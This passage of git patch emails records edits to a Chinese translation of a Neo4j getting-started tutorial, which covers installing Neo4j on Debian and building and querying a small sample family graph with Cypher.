+类似 MySQL 和其他数据库系统,Neo4j 的各类操作也使用一套查询语句。Cypher,就是 Neo4j 使用的查询语句,但有一些语法区别需要去学习和注意。节点 (Nodes)需要用圆括号表示而关系 (relationships) 需要放在方括号中。因为这是系统中唯二的数据类型,所以了解这些就够了。 -First, let's create all the nodes. You can copy and paste these into the top box in the browser window, which is where queries are run. +首先,我们创建所有的节点。你需要将下面内容复制黏贴到浏览器顶部用以运行查询语句的区域内。 ``` CREATE (a:Person { name: 'Jane Doe', favorite_color: 'purple' }) CREATE (b:Person { name: 'John Doe' }) CREATE (c:Person { name: 'Mary Smith', favorite_color: 'red', dob: '1992-11-09' }) CREATE (d:Person { name: 'Robert Roe' }) CREATE (e:Person { name: 'Rhonda Roe' }) CREATE (f:Person { name: 'Ryan Roe' }) CREATE (t:City { name: 'Petaluma, CA' }) CREATE (u:City { name: 'Cypress, TX' }) CREATE (v:City { name: 'Grand Prairie, TX' }) CREATE (w:City { name: 'Houston, TX' }) ``` -Note that the letter before the label is a variable. These will show up elsewhere; they're not useful here, but you can't just blindly create without assignment, so we'll use them and then discard them. +注意,在标签前的字符就是变量。这些信息会在各处展示,但我们在这里并不会用到。但你不能不指定 (without assignment) 相应信息就盲目创建,所以我们使用它们然后就忽略它们。 -You should be told that 10 nodes were created and 13 properties set. Want to see them? Here's a query that matches and returns all nodes: +在上面一共创建了10个节点和13个属性。想查看它们?通过下面语句来匹配查询所有节点: ``` MATCH (n) RETURN n ``` -This will return a visual graph. (Within the app, you can use the "fullscreen" icon on the returned graph to see the whole thing.) You'll see something like this: +这条语句会返回一个可视化图像。(在应用内,你可以在返回的图像中使用”全屏”按钮来查看大图)。你将会看到类似下面的图像: -### [article_2_image_2.jpg][3] +### [可视化.jpg][3] ![Visual graph](https://opensource.com/sites/default/files/u128651/article_2_image_2.jpg "Visual graph") -Adding a relationship is a little bit trickier; you must have the nodes you want to connect "in scope," meaning within the scope of the current query. The variables we used earlier have gone out of scope, so let's find John and Jane and marry them: +添加关系需要一点技巧;你需要连接的节点必须是 “在限定范围内的 (in scope)”,意思连接的节点是在当前查询语句所限定的范围内的。我们之前使用的查询语句范围太大,所以让我们找到 John 和 Jane 并让他们结婚: ``` MATCH (a:Person),(b:Person) WHERE a.name='Jane Doe' AND b.name='John Doe' CREATE (a)-[r:MARRIAGE {date: '2017-03-04', place: 'Houston, TX'}]->(b) ``` -This query will set two properties and create one relationship. Re-running the MATCH query shows that relationship. You can point your mouse arrow at any of the nodes or relationships to see the properties for that item. +这条语句会创建一个惯性并设置两个属性。重新运行 MATCH 语句会显示那个关系。你可以通过鼠标点击任意的节点或关系来查看它们的属性。 -Let's add the rest of the relationships. Rather than doing a bunch of MATCH statements, I'm going to do it once and CREATE multiple relationships from them. +我们来添加其他的关系。比起使用一些列的 MATCH 语句,我会一次性做完并从中 CREATE 创建多个关系。 ``` MATCH (a:Person),(b:Person),(c:Person),(d:Person),(e:Person),(f:Person),(t:City),(u:City),(v:City),(w:City) WHERE a.name='Jane Doe' AND b.name='John Doe' AND c.name='Mary Smith' AND d.name='Robert Roe' AND e.name='Rhonda Roe' AND f.name='Ryan Roe' AND t.name='Petaluma, CA' AND u.name='Cypress, TX' AND v.name='Grand Prairie, TX' AND w.name='Houston, TX' CREATE (d)-[m2:MARRIAGE {date: '1990-12-01', place: 'Chicago, IL'}]->(e) CREATE (a)-[n:CHILD]->(c) CREATE (d)-[n2:CHILD]->(f) CREATE (e)-[n3:CHILD]->(f) CREATE (b)-[n4:STEPCHILD]->(c) CREATE (a)-[o:BORN_IN]->(v) CREATE (b)-[o2:BORN_IN]->(t) CREATE (c)-[p:DATING]->(f) CREATE (a)-[q:LIVES_IN]->(u) CREATE (b)-[q1:LIVES_IN]->(u) CREATE (a)-[r:WORKS_IN]->(w) CREATE (a)-[s:FRIEND]->(d) CREATE (a)-[s2:FRIEND]->(e) ``` -Re-query with the MATCH statement, and you should have a graph like this: +重新运行 MATCH 语句,你将会看到下面图像: -### [article_2_image_3.jpg][4] +### [Match查询.jpg][4] ![Graph after re-querying with MATCH](https://opensource.com/sites/default/files/u128651/article_2_image_3.jpg "Graph after re-querying with MATCH") -If you want, you can drag the nodes around and end up with the same graph as my drawing from before. +如果你喜欢,你可以将节点拖拉成想我之前画的图的样子。 -In this example, the only MATCH we've done is to MATCH everything. Here's a query that will return the two married couples and show the relationship between them: +在这个例子中,我们唯一使用的 MATCH 就是 MATCH 所有的东西。下面这个查询会返回两个结婚了的夫妻并显示他们之间的关系: ``` MATCH (a)-[b:MARRIAGE]->(c) RETURN a,b,c ``` -With a more elaborate graph, you could do much more detailed searching. For instance, if you had a graph of Movie and Person nodes, and the relationships were roles like ACTED IN, DIRECTED, WROTE SCREENPLAY, and so forth, you could do queries like this: +在一个更复杂的图中,你可以做更多的细节查询。(译者注:此例子为Neo4j自带例子的) 例如,你有关于电影和人的节点,还有像 ACTED IN, DIRECTED, WROTE SCREENPLAY 等属性的关系,你可以运行下面这个查询: ``` MATCH (p:Person { name: 'Mel Gibson' })--(m:Movie) RETURN m.title ``` -...and get back a list of films connected to Mel Gibson in any way. But if you only wanted movies where he was an actor, this query would be more useful: +... 上述是查询和Mel Gibson相关的所有影片。但如果你想查询他演过的所有电影,下面这条语句会更有用: ``` MATCH (p:Person { name: 'Mel Gibson' })-[r:ACTED_IN]->(m:movie) RETURN m.title,r.role ``` -Fancier Cypher queries are possible, of course, and we're just scratching the surface here. The full documentation for the Cypher language is available [at the Neo4j website][12], and it has lots of examples to work with. +还有更多更炫酷的Cypher语句可以使用,但我们就简单介绍这些。更详细完整的 Cypher 语句可以在 Neo4j 的[官网][12]上查看, 并且也有很多例子可以练习。 -In the next article in this series, we'll write a little Perl script to create this same graph to show how to use graph databases in an application. - - -### About the author - -Ruth Holloway - Ruth Holloway has been a system administrator and software developer for a long, long time, getting her professional start on a VAX 11/780, way back when. She spent a lot of her career (so far) serving the technology needs of libraries, and has been a contributor since 2008 to the Koha open source library automation suite.Ruth is currently a Perl Developer at cPanel in Houston, and also serves as chief of staff for an obnoxious cat. In her copious free time, she occasionally reviews old romance... [more about Ruth Holloway][6] +在此系列的下篇文章中,我们会通过写些 Perl 脚本来展示如何在应用中使用图数据库。 -------------------------------------------------------------------------------- via: https://opensource.com/article/17/7/neo4j-graph-databases-getting-started 作者:[Ruth Holloway ][a] -译者:[译者ID](https://github.com/译者ID) +译者:[happygeorge01](https://github.com/happygeorge01) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From a311f0d9868650030919ac51825aec2221884925 Mon Sep 17 00:00:00 2001 From: happygeorge01 Date: Tue, 19 Dec 2017 09:13:10 +0800 Subject: [PATCH 0697/1627] Update 20170717 Neo4j and graph databases Getting started.md --- .../tech/20170717 Neo4j and graph databases Getting started.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20170717 Neo4j and graph databases Getting started.md b/sources/tech/20170717 Neo4j and graph databases Getting started.md index 2bbe9eaaca..3ba59eedd7 100644 --- a/sources/tech/20170717 Neo4j and graph databases Getting started.md +++ b/sources/tech/20170717 Neo4j and graph databases Getting started.md @@ -75,7 +75,7 @@ MATCH (a:Person),(b:Person),(c:Person),(d:Person),(e:Person),(f:Person),(t:City) 重新运行 MATCH 语句,你将会看到下面图像: -### [Match查询.jpg][4] +### [Match 查询.jpg][4] ![Graph after re-querying with MATCH](https://opensource.com/sites/default/files/u128651/article_2_image_3.jpg "Graph after re-querying with MATCH") From 7fac698b9e546cb3abafe875f4972a541fb1279e Mon Sep 17 00:00:00 2001 From: happygeorge01 Date: Tue, 19 Dec 2017 09:14:42 +0800 Subject: [PATCH 0698/1627] Update 20170717 Neo4j and graph databases Getting started.md --- .../tech/20170717 Neo4j and graph databases Getting started.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/sources/tech/20170717 Neo4j and graph databases Getting started.md b/sources/tech/20170717 Neo4j and graph databases Getting started.md index 3ba59eedd7..8dca0b7a00 100644 --- a/sources/tech/20170717 Neo4j and graph databases Getting started.md +++ b/sources/tech/20170717 Neo4j and graph databases Getting started.md @@ -6,9 +6,8 @@ Neo4j 和图数据库: 开始 ### 这是三篇文章系列中的第二篇,安装Neo4j并通过使用网页端在图中插入和查询数据。 ![Neo4j 和图数据库: 开始](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LIFE_wavegraph.png?itok=z4pXCf_c "Neo4j and graph databases: Getting started") -图片来源 :  -opensource.com +图片来源 : opensource.com 在系列的 [第一篇][8] 中,我们介绍了图数据库中的一些核心概念。在这篇,我们将安装 [Neo4j][9] 并通过网页端在图中插入并查询数据。 From 21766e1149bcf0acbd56cd7fbc73d082e5a58d9f Mon Sep 17 00:00:00 2001 From: happygeorge01 Date: Tue, 19 Dec 2017 09:17:57 +0800 Subject: [PATCH 0699/1627] Update 20170717 Neo4j and graph databases Getting started.md --- ...17 Neo4j and graph databases Getting started.md | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/sources/tech/20170717 Neo4j and graph databases Getting started.md b/sources/tech/20170717 Neo4j and graph databases Getting started.md index 8dca0b7a00..85c218dc20 100644 --- a/sources/tech/20170717 Neo4j and graph databases Getting started.md +++ b/sources/tech/20170717 Neo4j and graph databases Getting started.md @@ -11,9 +11,9 @@ Neo4j 和图数据库: 开始 在系列的 [第一篇][8] 中,我们介绍了图数据库中的一些核心概念。在这篇,我们将安装 [Neo4j][9] 并通过网页端在图中插入并查询数据。 -下载社区版的Neo4j可通过此 [传送门][10]!你可以下载Windows或OSX版来测试,也有各Linux发行版对应的版本,还有Docker版。 +下载社区版的 Neo4j 可通过此 [传送门][10]!你可以下载 Windows 或 OSX 版来测试,也有各 Linux 发行版对应的版本,还有 Docker 版。 -我会在Debian 9 (stretch)上安装软件。你可通过 [传送门][11] 来查看完整说明。如果你正在使用Debian 8 (jessie)或更老的版本,你可以安装现在的版本,但会出现的问题是jessie中并没有安装Neo4j运行所需要的Java 8环境。 +我会在 Debian 9 (stretch) 上安装软件。你可通过 [传送门][11] 来查看完整说明。如果你正在使用 Debian 8 (jessie)或更老的版本,你可以安装现在的版本,但会出现的问题是 jessie 中并没有安装 Neo4j 运行所需要的 Java 8 环境。 ``` wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add - echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list sudo apt-get update sudo apt-get install neo4j @@ -30,7 +30,7 @@ dbms.connectors.default_listen_address=0.0.0.0 ![Installing Neo4J](https://opensource.com/sites/default/files/u128651/article_2_image_1.jpg "Installing Neo4J") -我们在Neo4j上创建上篇文章中使用过的图。如下图: +我们在 Neo4j 上创建上篇文章中使用过的图。如下图: ### [图数据库节点图_2.jpg][2] @@ -46,7 +46,7 @@ CREATE (a:Person { name: 'Jane Doe', favorite_color: 'purple' }) CREATE (b:Perso 注意,在标签前的字符就是变量。这些信息会在各处展示,但我们在这里并不会用到。但你不能不指定 (without assignment) 相应信息就盲目创建,所以我们使用它们然后就忽略它们。 -在上面一共创建了10个节点和13个属性。想查看它们?通过下面语句来匹配查询所有节点: +在上面一共创建了 10 个节点和 13 个属性。想查看它们? 通过下面语句来匹配查询所有节点: ``` MATCH (n) RETURN n @@ -86,19 +86,19 @@ MATCH (a:Person),(b:Person),(c:Person),(d:Person),(e:Person),(f:Person),(t:City) MATCH (a)-[b:MARRIAGE]->(c) RETURN a,b,c ``` -在一个更复杂的图中,你可以做更多的细节查询。(译者注:此例子为Neo4j自带例子的) 例如,你有关于电影和人的节点,还有像 ACTED IN, DIRECTED, WROTE SCREENPLAY 等属性的关系,你可以运行下面这个查询: +在一个更复杂的图中,你可以做更多的细节查询。(译者注:此例子为 Neo4j 自带例子的) 例如,你有关于电影和人的节点,还有像 ACTED IN, DIRECTED, WROTE SCREENPLAY 等属性的关系,你可以运行下面这个查询: ``` MATCH (p:Person { name: 'Mel Gibson' })--(m:Movie) RETURN m.title ``` -... 上述是查询和Mel Gibson相关的所有影片。但如果你想查询他演过的所有电影,下面这条语句会更有用: +... 上述是查询和 Mel Gibson 相关的所有影片。但如果你想查询他演过的所有电影,下面这条语句会更有用: ``` MATCH (p:Person { name: 'Mel Gibson' })-[r:ACTED_IN]->(m:movie) RETURN m.title,r.role ``` -还有更多更炫酷的Cypher语句可以使用,但我们就简单介绍这些。更详细完整的 Cypher 语句可以在 Neo4j 的[官网][12]上查看, 并且也有很多例子可以练习。 +还有更多更炫酷的 Cypher 语句可以使用,但我们就简单介绍这些。更详细完整的 Cypher 语句可以在 Neo4j 的[官网][12]上查看, 并且也有很多例子可以练习。 在此系列的下篇文章中,我们会通过写些 Perl 脚本来展示如何在应用中使用图数据库。 From 600b263cc675c8f7f5d4f9ffac8959072d4df5e8 Mon Sep 17 00:00:00 2001 From: happygeorge01 Date: Tue, 19 Dec 2017 09:19:38 +0800 Subject: [PATCH 0700/1627] Delete 20170717 Neo4j and graph databases Getting started.md --- ...o4j and graph databases Getting started.md | 131 ------------------ 1 file changed, 131 deletions(-) delete mode 100644 sources/tech/20170717 Neo4j and graph databases Getting started.md diff --git a/sources/tech/20170717 Neo4j and graph databases Getting started.md b/sources/tech/20170717 Neo4j and graph databases Getting started.md deleted file mode 100644 index 85c218dc20..0000000000 --- a/sources/tech/20170717 Neo4j and graph databases Getting started.md +++ /dev/null @@ -1,131 +0,0 @@ -happygeorge01 is translating - -Neo4j 和图数据库: 开始 -============================================================ - -### 这是三篇文章系列中的第二篇,安装Neo4j并通过使用网页端在图中插入和查询数据。 - -![Neo4j 和图数据库: 开始](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LIFE_wavegraph.png?itok=z4pXCf_c "Neo4j and graph databases: Getting started") - -图片来源 : opensource.com - -在系列的 [第一篇][8] 中,我们介绍了图数据库中的一些核心概念。在这篇,我们将安装 [Neo4j][9] 并通过网页端在图中插入并查询数据。 - -下载社区版的 Neo4j 可通过此 [传送门][10]!你可以下载 Windows 或 OSX 版来测试,也有各 Linux 发行版对应的版本,还有 Docker 版。 - -我会在 Debian 9 (stretch) 上安装软件。你可通过 [传送门][11] 来查看完整说明。如果你正在使用 Debian 8 (jessie)或更老的版本,你可以安装现在的版本,但会出现的问题是 jessie 中并没有安装 Neo4j 运行所需要的 Java 8 环境。 - -``` -wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add - echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list sudo apt-get update sudo apt-get install neo4j -``` - -在我的系统中,因为有些不可知的原因,只有在我创建 **/var/run/neo4j** 之后才会它正常启动。Neo4j 也给了最大打开文件数 (maximum open files) 的警告,但因为是测试环境所以不太需要关心这个问题。Neo4j 默认只会监听本机 localhost 。无论我使用的是服务器而你使用的 Debian 是台式机都是可以的。同时我在 **/etc/neo4j/neo4j.conf** 中取消注释了下面这行: - -``` -dbms.connectors.default_listen_address=0.0.0.0 -``` - -在重启 Neo4j 之后,我可以通过 7474 端口来访问服务器的 Neo4j 服务。默认的用户名和密码是 Neo4j 和 **neo4j**; 你需要设置一个新密码,然后会出现初始页面: -### [Installing.jpg][1] - -![Installing Neo4J](https://opensource.com/sites/default/files/u128651/article_2_image_1.jpg "Installing Neo4J") - -我们在 Neo4j 上创建上篇文章中使用过的图。如下图: - -### [图数据库节点图_2.jpg][2] - -![Graph database image 2, defining a new type of node](https://opensource.com/sites/default/files/u128651/article_1_image_2.jpg "Graph database image 2, defining a new type of node") - -类似 MySQL 和其他数据库系统,Neo4j 的各类操作也使用一套查询语句。Cypher,就是 Neo4j 使用的查询语句,但有一些语法区别需要去学习和注意。节点 (Nodes)需要用圆括号表示而关系 (relationships) 需要放在方括号中。因为这是系统中唯二的数据类型,所以了解这些就够了。 - -首先,我们创建所有的节点。你需要将下面内容复制黏贴到浏览器顶部用以运行查询语句的区域内。 - -``` -CREATE (a:Person { name: 'Jane Doe', favorite_color: 'purple' }) CREATE (b:Person { name: 'John Doe' }) CREATE (c:Person { name: 'Mary Smith', favorite_color: 'red', dob: '1992-11-09' }) CREATE (d:Person { name: 'Robert Roe' }) CREATE (e:Person { name: 'Rhonda Roe' }) CREATE (f:Person { name: 'Ryan Roe' }) CREATE (t:City { name: 'Petaluma, CA' }) CREATE (u:City { name: 'Cypress, TX' }) CREATE (v:City { name: 'Grand Prairie, TX' }) CREATE (w:City { name: 'Houston, TX' }) -``` - -注意,在标签前的字符就是变量。这些信息会在各处展示,但我们在这里并不会用到。但你不能不指定 (without assignment) 相应信息就盲目创建,所以我们使用它们然后就忽略它们。 - -在上面一共创建了 10 个节点和 13 个属性。想查看它们? 通过下面语句来匹配查询所有节点: - -``` -MATCH (n) RETURN n -``` - -这条语句会返回一个可视化图像。(在应用内,你可以在返回的图像中使用”全屏”按钮来查看大图)。你将会看到类似下面的图像: - -### [可视化.jpg][3] - -![Visual graph](https://opensource.com/sites/default/files/u128651/article_2_image_2.jpg "Visual graph") - -添加关系需要一点技巧;你需要连接的节点必须是 “在限定范围内的 (in scope)”,意思连接的节点是在当前查询语句所限定的范围内的。我们之前使用的查询语句范围太大,所以让我们找到 John 和 Jane 并让他们结婚: - -``` -MATCH (a:Person),(b:Person) WHERE a.name='Jane Doe' AND b.name='John Doe' CREATE (a)-[r:MARRIAGE {date: '2017-03-04', place: 'Houston, TX'}]->(b) -``` - -这条语句会创建一个惯性并设置两个属性。重新运行 MATCH 语句会显示那个关系。你可以通过鼠标点击任意的节点或关系来查看它们的属性。 - -我们来添加其他的关系。比起使用一些列的 MATCH 语句,我会一次性做完并从中 CREATE 创建多个关系。 - -``` -MATCH (a:Person),(b:Person),(c:Person),(d:Person),(e:Person),(f:Person),(t:City),(u:City),(v:City),(w:City) WHERE a.name='Jane Doe' AND b.name='John Doe' AND c.name='Mary Smith' AND d.name='Robert Roe' AND e.name='Rhonda Roe' AND f.name='Ryan Roe' AND t.name='Petaluma, CA' AND u.name='Cypress, TX' AND v.name='Grand Prairie, TX' AND w.name='Houston, TX' CREATE (d)-[m2:MARRIAGE {date: '1990-12-01', place: 'Chicago, IL'}]->(e) CREATE (a)-[n:CHILD]->(c) CREATE (d)-[n2:CHILD]->(f) CREATE (e)-[n3:CHILD]->(f) CREATE (b)-[n4:STEPCHILD]->(c) CREATE (a)-[o:BORN_IN]->(v) CREATE (b)-[o2:BORN_IN]->(t) CREATE (c)-[p:DATING]->(f) CREATE (a)-[q:LIVES_IN]->(u) CREATE (b)-[q1:LIVES_IN]->(u) CREATE (a)-[r:WORKS_IN]->(w) CREATE (a)-[s:FRIEND]->(d) CREATE (a)-[s2:FRIEND]->(e) -``` - -重新运行 MATCH 语句,你将会看到下面图像: - -### [Match 查询.jpg][4] - -![Graph after re-querying with MATCH](https://opensource.com/sites/default/files/u128651/article_2_image_3.jpg "Graph after re-querying with MATCH") - -如果你喜欢,你可以将节点拖拉成想我之前画的图的样子。 - -在这个例子中,我们唯一使用的 MATCH 就是 MATCH 所有的东西。下面这个查询会返回两个结婚了的夫妻并显示他们之间的关系: - -``` -MATCH (a)-[b:MARRIAGE]->(c) RETURN a,b,c -``` - -在一个更复杂的图中,你可以做更多的细节查询。(译者注:此例子为 Neo4j 自带例子的) 例如,你有关于电影和人的节点,还有像 ACTED IN, DIRECTED, WROTE SCREENPLAY 等属性的关系,你可以运行下面这个查询: - -``` -MATCH (p:Person { name: 'Mel Gibson' })--(m:Movie) RETURN m.title -``` - -... 上述是查询和 Mel Gibson 相关的所有影片。但如果你想查询他演过的所有电影,下面这条语句会更有用: - -``` -MATCH (p:Person { name: 'Mel Gibson' })-[r:ACTED_IN]->(m:movie) RETURN m.title,r.role -``` - -还有更多更炫酷的 Cypher 语句可以使用,但我们就简单介绍这些。更详细完整的 Cypher 语句可以在 Neo4j 的[官网][12]上查看, 并且也有很多例子可以练习。 - -在此系列的下篇文章中,我们会通过写些 Perl 脚本来展示如何在应用中使用图数据库。 - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/7/neo4j-graph-databases-getting-started - -作者:[Ruth Holloway ][a] -译者:[happygeorge01](https://github.com/happygeorge01) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/druthb -[1]:https://opensource.com/file/363066 -[2]:https://opensource.com/file/363061 -[3]:https://opensource.com/file/363071 -[4]:https://opensource.com/file/363076 -[5]:https://opensource.com/article/17/7/neo4j-graph-databases-getting-started?rate=hqfP7Li5t_MqS9sV0FXwGAC0fVBoBXOglypRL7c-Zn4 -[6]:https://opensource.com/users/druthb -[7]:https://opensource.com/user/36051/feed -[8]:https://opensource.com/article/17/7/fundamentals-graph-databases-neo4j -[9]:https://neo4j.com/ -[10]:https://neo4j.com/download/community-edition/ -[11]:http://debian.neo4j.org/?_ga=2.172102506.853767004.1499179137-1089522652.1499179137 -[12]:https://neo4j.com/docs/developer-manual/current/cypher/ -[13]:https://opensource.com/users/druthb -[14]:https://opensource.com/users/druthb -[15]:https://opensource.com/users/druthb -[16]:https://opensource.com/tags/programming From e9133d1dd8797da3cc3998c92380f1841a0b15eb Mon Sep 17 00:00:00 2001 From: happygeorge01 Date: Tue, 19 Dec 2017 09:22:13 +0800 Subject: [PATCH 0701/1627] Create 20170717 Neo4j and graph databases Getting started.md --- ...o4j and graph databases Getting started.md | 129 ++++++++++++++++++ 1 file changed, 129 insertions(+) create mode 100644 translated/tech/20170717 Neo4j and graph databases Getting started.md diff --git a/translated/tech/20170717 Neo4j and graph databases Getting started.md b/translated/tech/20170717 Neo4j and graph databases Getting started.md new file mode 100644 index 0000000000..6eb40e35c4 --- /dev/null +++ b/translated/tech/20170717 Neo4j and graph databases Getting started.md @@ -0,0 +1,129 @@ +Neo4j 和图数据库: 开始 +============================================================ + +### 这是三篇文章系列中的第二篇,安装Neo4j并通过使用网页端在图中插入和查询数据。 + +![Neo4j 和图数据库: 开始](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LIFE_wavegraph.png?itok=z4pXCf_c "Neo4j and graph databases: Getting started") + +图片来源 : opensource.com + +在系列的 [第一篇][8] 中,我们介绍了图数据库中的一些核心概念。在这篇,我们将安装 [Neo4j][9] 并通过网页端在图中插入并查询数据。 + +下载社区版的 Neo4j 可通过此 [传送门][10]!你可以下载 Windows 或 OSX 版来测试,也有各 Linux 发行版对应的版本,还有 Docker 版。 + +我会在 Debian 9 (stretch) 上安装软件。你可通过 [传送门][11] 来查看完整说明。如果你正在使用 Debian 8 (jessie)或更老的版本,你可以安装现在的版本,但会出现的问题是 jessie 中并没有安装 Neo4j 运行所需要的 Java 8 环境。 + +``` +wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add - echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list sudo apt-get update sudo apt-get install neo4j +``` + +在我的系统中,因为有些不可知的原因,只有在我创建 **/var/run/neo4j** 之后才会它正常启动。Neo4j 也给了最大打开文件数 (maximum open files) 的警告,但因为是测试环境所以不太需要关心这个问题。Neo4j 默认只会监听本机 localhost 。无论我使用的是服务器而你使用的 Debian 是台式机都是可以的。同时我在 **/etc/neo4j/neo4j.conf** 中取消注释了下面这行: + +``` +dbms.connectors.default_listen_address=0.0.0.0 +``` + +在重启 Neo4j 之后,我可以通过 7474 端口来访问服务器的 Neo4j 服务。默认的用户名和密码是 Neo4j 和 **neo4j**; 你需要设置一个新密码,然后会出现初始页面: +### [Installing.jpg][1] + +![Installing Neo4J](https://opensource.com/sites/default/files/u128651/article_2_image_1.jpg "Installing Neo4J") + +我们在 Neo4j 上创建上篇文章中使用过的图。如下图: + +### [图数据库节点图_2.jpg][2] + +![Graph database image 2, defining a new type of node](https://opensource.com/sites/default/files/u128651/article_1_image_2.jpg "Graph database image 2, defining a new type of node") + +类似 MySQL 和其他数据库系统,Neo4j 的各类操作也使用一套查询语句。Cypher,就是 Neo4j 使用的查询语句,但有一些语法区别需要去学习和注意。节点 (Nodes)需要用圆括号表示而关系 (relationships) 需要放在方括号中。因为这是系统中唯二的数据类型,所以了解这些就够了。 + +首先,我们创建所有的节点。你需要将下面内容复制黏贴到浏览器顶部用以运行查询语句的区域内。 + +``` +CREATE (a:Person { name: 'Jane Doe', favorite_color: 'purple' }) CREATE (b:Person { name: 'John Doe' }) CREATE (c:Person { name: 'Mary Smith', favorite_color: 'red', dob: '1992-11-09' }) CREATE (d:Person { name: 'Robert Roe' }) CREATE (e:Person { name: 'Rhonda Roe' }) CREATE (f:Person { name: 'Ryan Roe' }) CREATE (t:City { name: 'Petaluma, CA' }) CREATE (u:City { name: 'Cypress, TX' }) CREATE (v:City { name: 'Grand Prairie, TX' }) CREATE (w:City { name: 'Houston, TX' }) +``` + +注意,在标签前的字符就是变量。这些信息会在各处展示,但我们在这里并不会用到。但你不能不指定 (without assignment) 相应信息就盲目创建,所以我们使用它们然后就忽略它们。 + +在上面一共创建了 10 个节点和 13 个属性。想查看它们? 通过下面语句来匹配查询所有节点: + +``` +MATCH (n) RETURN n +``` + +这条语句会返回一个可视化图像。(在应用内,你可以在返回的图像中使用”全屏”按钮来查看大图)。你将会看到类似下面的图像: + +### [可视化.jpg][3] + +![Visual graph](https://opensource.com/sites/default/files/u128651/article_2_image_2.jpg "Visual graph") + +添加关系需要一点技巧;你需要连接的节点必须是 “在限定范围内的 (in scope)”,意思连接的节点是在当前查询语句所限定的范围内的。我们之前使用的查询语句范围太大,所以让我们找到 John 和 Jane 并让他们结婚: + +``` +MATCH (a:Person),(b:Person) WHERE a.name='Jane Doe' AND b.name='John Doe' CREATE (a)-[r:MARRIAGE {date: '2017-03-04', place: 'Houston, TX'}]->(b) +``` + +这条语句会创建一个惯性并设置两个属性。重新运行 MATCH 语句会显示那个关系。你可以通过鼠标点击任意的节点或关系来查看它们的属性。 + +我们来添加其他的关系。比起使用一些列的 MATCH 语句,我会一次性做完并从中 CREATE 创建多个关系。 + +``` +MATCH (a:Person),(b:Person),(c:Person),(d:Person),(e:Person),(f:Person),(t:City),(u:City),(v:City),(w:City) WHERE a.name='Jane Doe' AND b.name='John Doe' AND c.name='Mary Smith' AND d.name='Robert Roe' AND e.name='Rhonda Roe' AND f.name='Ryan Roe' AND t.name='Petaluma, CA' AND u.name='Cypress, TX' AND v.name='Grand Prairie, TX' AND w.name='Houston, TX' CREATE (d)-[m2:MARRIAGE {date: '1990-12-01', place: 'Chicago, IL'}]->(e) CREATE (a)-[n:CHILD]->(c) CREATE (d)-[n2:CHILD]->(f) CREATE (e)-[n3:CHILD]->(f) CREATE (b)-[n4:STEPCHILD]->(c) CREATE (a)-[o:BORN_IN]->(v) CREATE (b)-[o2:BORN_IN]->(t) CREATE (c)-[p:DATING]->(f) CREATE (a)-[q:LIVES_IN]->(u) CREATE (b)-[q1:LIVES_IN]->(u) CREATE (a)-[r:WORKS_IN]->(w) CREATE (a)-[s:FRIEND]->(d) CREATE (a)-[s2:FRIEND]->(e) +``` + +重新运行 MATCH 语句,你将会看到下面图像: + +### [Match 查询.jpg][4] + +![Graph after re-querying with MATCH](https://opensource.com/sites/default/files/u128651/article_2_image_3.jpg "Graph after re-querying with MATCH") + +如果你喜欢,你可以将节点拖拉成想我之前画的图的样子。 + +在这个例子中,我们唯一使用的 MATCH 就是 MATCH 所有的东西。下面这个查询会返回两个结婚了的夫妻并显示他们之间的关系: + +``` +MATCH (a)-[b:MARRIAGE]->(c) RETURN a,b,c +``` + +在一个更复杂的图中,你可以做更多的细节查询。(译者注:此例子为 Neo4j 自带例子的) 例如,你有关于电影和人的节点,还有像 ACTED IN, DIRECTED, WROTE SCREENPLAY 等属性的关系,你可以运行下面这个查询: + +``` +MATCH (p:Person { name: 'Mel Gibson' })--(m:Movie) RETURN m.title +``` + +... 上述是查询和 Mel Gibson 相关的所有影片。但如果你想查询他演过的所有电影,下面这条语句会更有用: + +``` +MATCH (p:Person { name: 'Mel Gibson' })-[r:ACTED_IN]->(m:movie) RETURN m.title,r.role +``` + +还有更多更炫酷的 Cypher 语句可以使用,但我们就简单介绍这些。更详细完整的 Cypher 语句可以在 Neo4j 的[官网][12]上查看, 并且也有很多例子可以练习。 + +在此系列的下篇文章中,我们会通过写些 Perl 脚本来展示如何在应用中使用图数据库。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/7/neo4j-graph-databases-getting-started + +作者:[Ruth Holloway ][a] +译者:[happygeorge01](https://github.com/happygeorge01) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/druthb +[1]:https://opensource.com/file/363066 +[2]:https://opensource.com/file/363061 +[3]:https://opensource.com/file/363071 +[4]:https://opensource.com/file/363076 +[5]:https://opensource.com/article/17/7/neo4j-graph-databases-getting-started?rate=hqfP7Li5t_MqS9sV0FXwGAC0fVBoBXOglypRL7c-Zn4 +[6]:https://opensource.com/users/druthb +[7]:https://opensource.com/user/36051/feed +[8]:https://opensource.com/article/17/7/fundamentals-graph-databases-neo4j +[9]:https://neo4j.com/ +[10]:https://neo4j.com/download/community-edition/ +[11]:http://debian.neo4j.org/?_ga=2.172102506.853767004.1499179137-1089522652.1499179137 +[12]:https://neo4j.com/docs/developer-manual/current/cypher/ +[13]:https://opensource.com/users/druthb +[14]:https://opensource.com/users/druthb +[15]:https://opensource.com/users/druthb +[16]:https://opensource.com/tags/programming From 